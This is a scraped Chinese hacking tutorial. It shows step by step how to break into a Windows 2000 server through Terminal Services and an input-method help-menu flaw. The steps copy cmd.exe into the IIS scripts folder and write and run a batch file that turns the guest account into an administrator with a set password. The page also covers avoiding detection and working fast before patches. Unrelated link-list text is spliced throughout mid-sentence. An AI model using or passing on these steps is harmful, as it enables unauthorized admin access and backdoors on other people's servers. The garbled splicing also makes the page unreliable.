由于微软对中国产品不付责任的态度,使得安装了Win2K Server入侵监测Microsoft Windows 终端服务错误地址漏洞 如何利用终端服务入侵远程计算机DameWare NT Utilities,比3389更强大的GUI控制!NT/2000提升权限的方法小结 解析进程不能访问网络资源 输入法漏洞之完全心得Windows2000安全检查清单几种流行的入侵工具与讲解[转]Windows 2000 的通用的SIDs 相关链接共 15 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"终端服务和全拼(^^我只在全拼下成
功)的w2k 浅谈用delphi来编写蠕虫病毒 常见拒绝服务攻击类型(Dos attack)极其原理从小榕之流光谈口令安全小木马cnc源代码及开发文档Windows NT攻击大全系统管理员如何防范黑客攻击WinShell v3.0 中文帮助应用软件黑客入侵大揭秘DeleGate跨站脚本可执行漏洞 计算机病毒如何感染您的网络相关链接共 262 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"服务器
存在着远程登陆并能获取超级用户teTeX Filters 临时文件存在竞争条件漏洞 Security Issues in Perl Scripts 分析进入Win2000后留下的足迹 rootkit综述The Solaris安全FAQ从小榕之流光谈口令安全Windows 2000漏洞集锦Nmap网络安全扫描器说明(2)apache服务器的保护Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法相关链接共 195 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功
入侵并装好攻击CISCO路由器后门技巧木马的分析方法 OpenBSD可加载内核模块编程完全指南 感染linux脚本程序技术一些FreeBSD相关的安全问题 如何防止Windows远程共享漏洞 关于NT LOG记录系统管理员如何防范黑客攻击浅谈数据库的攻击相关链接共 78 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"后门(
嘻,现在流行走后门^^)。
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就
赶快赶下家吧,人
家打补丁了),点帮助,点输入法入门;
4.在\"选项\"菜单上点右键--->跳转到Win2K Server入侵监测passfingerprint.pl源码(用于判别远程操作系统类型)Resource Kit 第二部分简述Sniffer 互联网安全标准Windows 2000漏洞集锦如何阅读源代码解析IE中的about:blank教学文件(感谢网友提供!)安全性与INTERNET信息服务器IIS相关链接共 112 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"URL\",输入:c:\\winnt\\system32\\cmd.exe.(如果不能
确定NT系统目录,
则输入:c:\\ 或d:\\ ……进行查找确定);
5.选择\"保存到磁盘\" 选择目录:c:\\inetpub\\scripts\\,因实际上是对方服务器上文件自身
的复制操作,所以
这个过程很快就会完成;
6.打开IE,输入: http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?好我
们继续;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go
.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
如果不是,可能那步操作有误哦!
11.在\"选项\"菜单上点右键--->跳转到URL\",输入:c:\\inetpub\\scripts\\go.bat --->在磁盘
当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,win2k漏洞锦集网络安全方面的专业词汇浅谈用delphi来编写蠕虫病毒 WIN95/98的安全措施 inthepicture的使用说明书Unix网络的两个安全问题VPN基本概念解释Back OrificeUnix黑客初学者指导从小榕之流光谈口令安全相关链接共 186 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"密码为:elise,超级用户呢
! (我喜欢guest
而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC入侵工略及防范 用SYN包特性增强网络安全一些系统的缺省口令利用unicode和net dde漏洞夺取系统管理员权限通过NetBIOS入侵 Windows2000安全检查清单Windows 2000 安全设置检查清单Anonymizing UNIX SystemsIPC和管道简介一般入侵所需要的几个常用命令 相关链接共 24 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"IPC$连接,想怎样做就怎样做
了,当然,你也可
名正言顺的用guest直接登陆到他的服务器,到他机器上去跳舞啦:)
注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,
但如果他正打开了
终端服务管理器,你就惨了了:(这时他就能看到你所打开的进程id、程序映象,你的ip及
机器名,并能发消
息给你呢!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快
点为妙,小女子为
此不知浪费了多少的网费和精力。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子
可就这样吃亏过一
次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx
……:(
4.此法与对方的用SYN包特性增强网络安全如何突破各种防火墙的防护SSL中间人攻击Nessus安全测试插件编写教程2DoS?后门,隐藏通道及HTTP(S)TCP/IP协议安全性能 菜鸟操补丁版Win2K Server入侵监测NETBUS2.0说明相关链接共 103 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1003658767#"防火墙无关,放心使用吧。
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动te
lnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入
,再跳一次吧!:
)
堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\\ter
msrv.exe;(如果
哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧
?^^)
问题(高手请赐教):
1.如果IE下的www访问需要密码,怎办?
2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令
